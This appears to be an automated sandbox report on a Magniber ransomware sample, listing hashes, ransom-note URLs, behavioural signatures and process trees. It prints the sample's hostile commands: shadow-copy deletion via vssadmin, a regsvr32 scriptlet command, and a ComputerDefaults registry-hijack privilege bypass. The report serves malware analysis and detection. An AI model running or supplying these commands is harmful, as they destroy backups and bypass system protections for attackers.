Analysis
max time kernel: 143s
max time network: 127s
platform: windows10_x64
resource: win10-en-20211104
submitted: 22-11-2021 19:18
Static task: static1
Behavioral task: behavioral1
  Sample: 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
  Resource: win7-en-20211014
Behavioral task: behavioral2
  Sample: 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
  Resource: win10-en-20211104
General
Target: 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Size: 22KB
MD5: 7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1: e7304e2436dc0eddddba229f1ec7145055030151
SHA256: 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
SHA512: c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1
Malware Config
Extracted from: C:\Users\Admin\Desktop\readme.txt
Family: magniber
URLs:
http://b0dca0f0125852c0celtalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj
http://b0dca0f0125852c0celtalkfzj.jobsbig.cam/eltalkfzj
http://b0dca0f0125852c0celtalkfzj.boxgas.icu/eltalkfzj
http://b0dca0f0125852c0celtalkfzj.sixsees.club/eltalkfzj
http://b0dca0f0125852c0celtalkfzj.nowuser.casa/eltalkfzj
Signatures

Magniber Ransomware
Ransomware family widely seen in Asia, distributed by the Magnitude exploit kit.
Process spawned unexpected child process (12 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2892 | 1804 | cmd.exe | 93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3756 | 1804 | cmd.exe | 93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1096 | 1804 | cmd.exe | 93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4104 | 1804 | cmd.exe | 93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4232 | 1804 | cmd.exe | 93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4276 | 1804 | cmd.exe | 93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4268 | 1804 | cmd.exe | 93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4344 | 1804 | cmd.exe | 93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4404 | 1804 | cmd.exe | 93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4388 | 1804 | cmd.exe | 93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4500 | 1804 | cmd.exe | 93
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4568 | 1804 | cmd.exe | 93
Modifies extensions of user files (6 IoCs)
Ransomware generally changes the extension on encrypted files.
description | ioc | Process
File renamed | C:\Users\Admin\Pictures\ExpandUnpublish.raw => C:\Users\Admin\Pictures\ExpandUnpublish.raw.eltalkfzj | sihost.exe
File renamed | C:\Users\Admin\Pictures\MeasureRedo.raw => C:\Users\Admin\Pictures\MeasureRedo.raw.eltalkfzj | sihost.exe
File renamed | C:\Users\Admin\Pictures\RepairExit.crw => C:\Users\Admin\Pictures\RepairExit.crw.eltalkfzj | sihost.exe
File opened for modification | C:\Users\Admin\Pictures\CompressJoin.tiff | sihost.exe
File renamed | C:\Users\Admin\Pictures\CompressJoin.tiff => C:\Users\Admin\Pictures\CompressJoin.tiff.eltalkfzj | sihost.exe
File renamed | C:\Users\Admin\Pictures\ResumeConvertFrom.tif => C:\Users\Admin\Pictures\ResumeConvertFrom.tif.eltalkfzj | sihost.exe
Suspicious use of SetThreadContext (6 IoCs)
description | pid | Process | procid_target
PID 2396 set thread context of 2400 | 2396 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 30
PID 2396 set thread context of 2448 | 2396 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 29
PID 2396 set thread context of 2728 | 2396 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 23
PID 2396 set thread context of 3016 | 2396 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 12
PID 2396 set thread context of 3472 | 2396 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 13
PID 2396 set thread context of 3672 | 2396 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 21
Program crash (1 IoC)
pid | pid_target | Process | procid_target
2644 | 3672 | WerFault.exe | 21
Modifies registry class (29 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | svchost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" | taskhostw.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open | sihost.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" | sihost.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" | taskhostw.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" | svchost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | taskhostw.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | RuntimeBroker.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" | sihost.exe
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command | taskhostw.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" | RuntimeBroker.exe
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell | sihost.exe
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command | svchost.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" | svchost.exe
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command | sihost.exe
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings | sihost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | sihost.exe
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" | RuntimeBroker.exe
Opens file in notepad (likely ransom note) (1 IoC)
pid | Process
504 | notepad.exe
Suspicious behavior: EnumeratesProcesses (14 IoCs)
pid | Process
2396 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2396 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2644 | WerFault.exe
2644 | WerFault.exe
2644 | WerFault.exe
2644 | WerFault.exe
2644 | WerFault.exe
2644 | WerFault.exe
2644 | WerFault.exe
2644 | WerFault.exe
2644 | WerFault.exe
2644 | WerFault.exe
2644 | WerFault.exe
2644 | WerFault.exe
Suspicious behavior: GetForegroundWindowSpam (1 IoC)
pid | Process
3016 | Explorer.EXE
Suspicious behavior: MapViewOfSection (6 IoCs)
pid | Process
2396 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2396 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2396 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2396 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2396 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2396 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2644 | WerFault.exe
Token: SeShutdownPrivilege | 3016 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3016 | Explorer.EXE
Token: SeShutdownPrivilege | 3016 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3016 | Explorer.EXE
Token: SeShutdownPrivilege | 3016 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3016 | Explorer.EXE
Token: SeShutdownPrivilege | 3016 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3016 | Explorer.EXE
Token: SeShutdownPrivilege | 3016 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3016 | Explorer.EXE
Token: SeShutdownPrivilege | 3016 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3016 | Explorer.EXE
Token: SeShutdownPrivilege | 3016 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3016 | Explorer.EXE
Token: SeShutdownPrivilege | 3016 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3016 | Explorer.EXE
Token: SeShutdownPrivilege | 3016 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3016 | Explorer.EXE
Token: SeShutdownPrivilege | 3016 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3016 | Explorer.EXE
Token: SeShutdownPrivilege | 3016 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3016 | Explorer.EXE
Token: SeIncreaseQuotaPrivilege | 1224 | WMIC.exe
Token: SeSecurityPrivilege | 1224 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 1224 | WMIC.exe
Token: SeLoadDriverPrivilege | 1224 | WMIC.exe
Token: SeSystemProfilePrivilege | 1224 | WMIC.exe
Token: SeSystemtimePrivilege | 1224 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 1224 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 1224 | WMIC.exe
Token: SeCreatePagefilePrivilege | 1224 | WMIC.exe
Token: SeBackupPrivilege | 1224 | WMIC.exe
Token: SeRestorePrivilege | 1224 | WMIC.exe
Token: SeShutdownPrivilege | 1224 | WMIC.exe
Token: SeDebugPrivilege | 1224 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 1224 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 1224 | WMIC.exe
Token: SeUndockPrivilege | 1224 | WMIC.exe
Token: SeManageVolumePrivilege | 1224 | WMIC.exe
Token: 33 | 1224 | WMIC.exe
Token: 34 | 1224 | WMIC.exe
Token: 35 | 1224 | WMIC.exe
Token: 36 | 1224 | WMIC.exe
Token: SeShutdownPrivilege | 3016 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3016 | Explorer.EXE
Token: SeShutdownPrivilege | 3016 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3016 | Explorer.EXE
Token: SeIncreaseQuotaPrivilege | 440 | WMIC.exe
Token: SeSecurityPrivilege | 440 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 440 | WMIC.exe
Token: SeLoadDriverPrivilege | 440 | WMIC.exe
Token: SeSystemProfilePrivilege | 440 | WMIC.exe
Token: SeSystemtimePrivilege | 440 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 440 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 440 | WMIC.exe
Token: SeCreatePagefilePrivilege | 440 | WMIC.exe
Token: SeBackupPrivilege | 440 | WMIC.exe
Token: SeRestorePrivilege | 440 | WMIC.exe
Token: SeShutdownPrivilege | 440 | WMIC.exe
Token: SeDebugPrivilege | 440 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 440 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 440 | WMIC.exe
Token: SeUndockPrivilege | 440 | WMIC.exe
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 2400 wrote to memory of 504 | 2400 | sihost.exe | 71
PID 2400 wrote to memory of 504 | 2400 | sihost.exe | 71
PID 2400 wrote to memory of 3108 | 2400 | sihost.exe | 72
PID 2400 wrote to memory of 3108 | 2400 | sihost.exe | 72
PID 2400 wrote to memory of 428 | 2400 | sihost.exe | 73
PID 2400 wrote to memory of 428 | 2400 | sihost.exe | 73
PID 2400 wrote to memory of 872 | 2400 | sihost.exe | 74
PID 2400 wrote to memory of 872 | 2400 | sihost.exe | 74
PID 872 wrote to memory of 1224 | 872 | cmd.exe | 78
PID 872 wrote to memory of 1224 | 872 | cmd.exe | 78
PID 2448 wrote to memory of 2880 | 2448 | svchost.exe | 79
PID 2448 wrote to memory of 2880 | 2448 | svchost.exe | 79
PID 2448 wrote to memory of 1416 | 2448 | svchost.exe | 80
PID 2448 wrote to memory of 1416 | 2448 | svchost.exe | 80
PID 428 wrote to memory of 440 | 428 | cmd.exe | 83
PID 428 wrote to memory of 440 | 428 | cmd.exe | 83
PID 2728 wrote to memory of 712 | 2728 | taskhostw.exe | 84
PID 2728 wrote to memory of 712 | 2728 | taskhostw.exe | 84
PID 2728 wrote to memory of 2280 | 2728 | taskhostw.exe | 86
PID 2728 wrote to memory of 2280 | 2728 | taskhostw.exe | 86
PID 1416 wrote to memory of 908 | 1416 | cmd.exe | 87
PID 1416 wrote to memory of 908 | 1416 | cmd.exe | 87
PID 3016 wrote to memory of 1248 | 3016 | Explorer.EXE | 89
PID 3016 wrote to memory of 1248 | 3016 | Explorer.EXE | 89
PID 3016 wrote to memory of 1496 | 3016 | Explorer.EXE | 90
PID 3016 wrote to memory of 1496 | 3016 | Explorer.EXE | 90
PID 2880 wrote to memory of 2284 | 2880 | cmd.exe | 94
PID 2880 wrote to memory of 2284 | 2880 | cmd.exe | 94
PID 3472 wrote to memory of 2508 | 3472 | RuntimeBroker.exe | 95
PID 3472 wrote to memory of 2508 | 3472 | RuntimeBroker.exe | 95
PID 3472 wrote to memory of 2936 | 3472 | RuntimeBroker.exe | 97
PID 3472 wrote to memory of 2936 | 3472 | RuntimeBroker.exe | 97
PID 2280 wrote to memory of 1796 | 2280 | cmd.exe | 99
PID 2280 wrote to memory of 1796 | 2280 | cmd.exe | 99
PID 712 wrote to memory of 1420 | 712 | cmd.exe | 100
PID 712 wrote to memory of 1420 | 712 | cmd.exe | 100
PID 1496 wrote to memory of 1476 | 1496 | cmd.exe | 101
PID 1496 wrote to memory of 1476 | 1496 | cmd.exe | 101
PID 2396 wrote to memory of 2292 | 2396 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 102
PID 2396 wrote to memory of 2292 | 2396 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 102
PID 2396 wrote to memory of 2336 | 2396 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 103
PID 2396 wrote to memory of 2336 | 2396 | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe | 103
PID 1248 wrote to memory of 4060 | 1248 | cmd.exe | 104
PID 1248 wrote to memory of 4060 | 1248 | cmd.exe | 104
PID 2936 wrote to memory of 1076 | 2936 | cmd.exe | 107
PID 2936 wrote to memory of 1076 | 2936 | cmd.exe | 107
PID 2508 wrote to memory of 3764 | 2508 | cmd.exe | 108
PID 2508 wrote to memory of 3764 | 2508 | cmd.exe | 108
PID 2336 wrote to memory of 320 | 2336 | cmd.exe | 109
PID 2336 wrote to memory of 320 | 2336 | cmd.exe | 109
PID 2292 wrote to memory of 2876 | 2292 | cmd.exe | 110
PID 2292 wrote to memory of 2876 | 2292 | cmd.exe | 110
PID 1096 wrote to memory of 2668 | 1096 | cmd.exe | 117
PID 1096 wrote to memory of 2668 | 1096 | cmd.exe | 117
PID 2892 wrote to memory of 3076 | 2892 | cmd.exe | 118
PID 2892 wrote to memory of 3076 | 2892 | cmd.exe | 118
PID 3756 wrote to memory of 980 | 3756 | cmd.exe | 119
PID 3756 wrote to memory of 980 | 3756 | cmd.exe | 119
PID 4104 wrote to memory of 4168 | 4104 | cmd.exe | 122
PID 4104 wrote to memory of 4168 | 4104 | cmd.exe | 122
PID 4232 wrote to memory of 4380 | 4232 | cmd.exe | 135
PID 4232 wrote to memory of 4380 | 4232 | cmd.exe | 135
PID 4268 wrote to memory of 4544 | 4268 | cmd.exe | 138
PID 4268 wrote to memory of 4544 | 4268 | cmd.exe | 138
Processes
(Indentation shows the process tree depth; each entry gives image path, PID, command line and the signatures matched by that process.)

C:\Windows\Explorer.EXE (PID 3016)
  Command line: C:\Windows\Explorer.EXE
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe (PID 2396)
    Command line: "C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"
    - Suspicious use of SetThreadContext
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    C:\Windows\SYSTEM32\cmd.exe (PID 2292)
      Command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\wbem\WMIC.exe (PID 2876)
        Command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    C:\Windows\SYSTEM32\cmd.exe (PID 2336)
      Command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\wbem\WMIC.exe (PID 320)
        Command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
  C:\Windows\system32\cmd.exe (PID 1248)
    Command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wbem\WMIC.exe (PID 4060)
      Command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
  C:\Windows\system32\cmd.exe (PID 1496)
    Command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wbem\WMIC.exe (PID 1476)
      Command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
C:\Windows\System32\RuntimeBroker.exe (PID 3472)
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\cmd.exe (PID 2508)
    Command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wbem\WMIC.exe (PID 3764)
      Command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
  C:\Windows\System32\cmd.exe (PID 2936)
    Command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wbem\WMIC.exe (PID 1076)
      Command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
C:\Windows\system32\DllHost.exe (PID 3672)
  Command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe (PID 2644)
    Command line: C:\Windows\system32\WerFault.exe -u -p 3672 -s 812
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
c:\windows\system32\taskhostw.exe (PID 2728)
  Command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  \??\c:\windows\system32\cmd.exe (PID 712)
    Command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wbem\WMIC.exe (PID 1420)
      Command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
  \??\c:\windows\system32\cmd.exe (PID 2280)
    Command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wbem\WMIC.exe (PID 1796)
      Command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
c:\windows\system32\svchost.exe (PID 2448)
  Command line: c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  \??\c:\windows\system32\cmd.exe (PID 2880)
    Command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wbem\WMIC.exe (PID 2284)
      Command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
  \??\c:\windows\system32\cmd.exe (PID 1416)
    Command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wbem\WMIC.exe (PID 908)
      Command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
c:\windows\system32\sihost.exe (PID 2400)
  Command line: sihost.exe
  - Modifies extensions of user files
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  \??\c:\windows\system32\notepad.exe (PID 504)
    Command line: notepad.exe C:\Users\Public\readme.txt
    - Opens file in notepad (likely ransom note)
  \??\c:\windows\system32\cmd.exe (PID 3108)
    Command line: cmd /c "start http://b0dca0f0125852c0celtalkfzj.jobsbig.cam/eltalkfzj^&1^&48225306^&74^&315^&2215063"
  \??\c:\windows\system32\cmd.exe (PID 428)
    Command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wbem\WMIC.exe (PID 440)
      Command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      - Suspicious use of AdjustPrivilegeToken
  \??\c:\windows\system32\cmd.exe (PID 872)
    Command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wbem\WMIC.exe (PID 1224)
      Command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\cmd.exe (PID 2892)
  Command line: cmd /c computerdefaults.exe
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\ComputerDefaults.exe (PID 3076)
    Command line: computerdefaults.exe

C:\Windows\system32\cmd.exe (PID 3756)
  Command line: cmd /c computerdefaults.exe
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\ComputerDefaults.exe (PID 980)
    Command line: computerdefaults.exe

C:\Windows\system32\cmd.exe (PID 1096)
  Command line: cmd /c computerdefaults.exe
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\ComputerDefaults.exe (PID 2668)
    Command line: computerdefaults.exe

C:\Windows\system32\cmd.exe (PID 4104)
  Command line: cmd /c computerdefaults.exe
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\ComputerDefaults.exe (PID 4168)
    Command line: computerdefaults.exe

C:\Windows\system32\cmd.exe (PID 4232)
  Command line: cmd /c computerdefaults.exe
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\ComputerDefaults.exe (PID 4380)
    Command line: computerdefaults.exe

C:\Windows\system32\cmd.exe (PID 4276)
  Command line: cmd /c computerdefaults.exe
  - Process spawned unexpected child process
  C:\Windows\system32\ComputerDefaults.exe (PID 4560)
    Command line: computerdefaults.exe

C:\Windows\system32\cmd.exe (PID 4268)
  Command line: cmd /c computerdefaults.exe
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\ComputerDefaults.exe (PID 4544)
    Command line: computerdefaults.exe

C:\Windows\system32\cmd.exe (PID 4344)
  Command line: cmd /c computerdefaults.exe
  - Process spawned unexpected child process
  C:\Windows\system32\ComputerDefaults.exe (PID 4664)
    Command line: computerdefaults.exe

C:\Windows\system32\cmd.exe (PID 4404)
  Command line: cmd /c computerdefaults.exe
  - Process spawned unexpected child process
  C:\Windows\system32\ComputerDefaults.exe (PID 4716)
    Command line: computerdefaults.exe

C:\Windows\system32\cmd.exe (PID 4388)
  Command line: cmd /c computerdefaults.exe
  - Process spawned unexpected child process
  C:\Windows\system32\ComputerDefaults.exe (PID 4704)
    Command line: computerdefaults.exe

C:\Windows\system32\cmd.exe (PID 4500)
  Command line: cmd /c computerdefaults.exe
  - Process spawned unexpected child process
  C:\Windows\system32\ComputerDefaults.exe (PID 4756)
    Command line: computerdefaults.exe

C:\Windows\system32\cmd.exe (PID 4568)
  Command line: cmd /c computerdefaults.exe
  - Process spawned unexpected child process
  C:\Windows\system32\ComputerDefaults.exe (PID 4812)
    Command line: computerdefaults.exe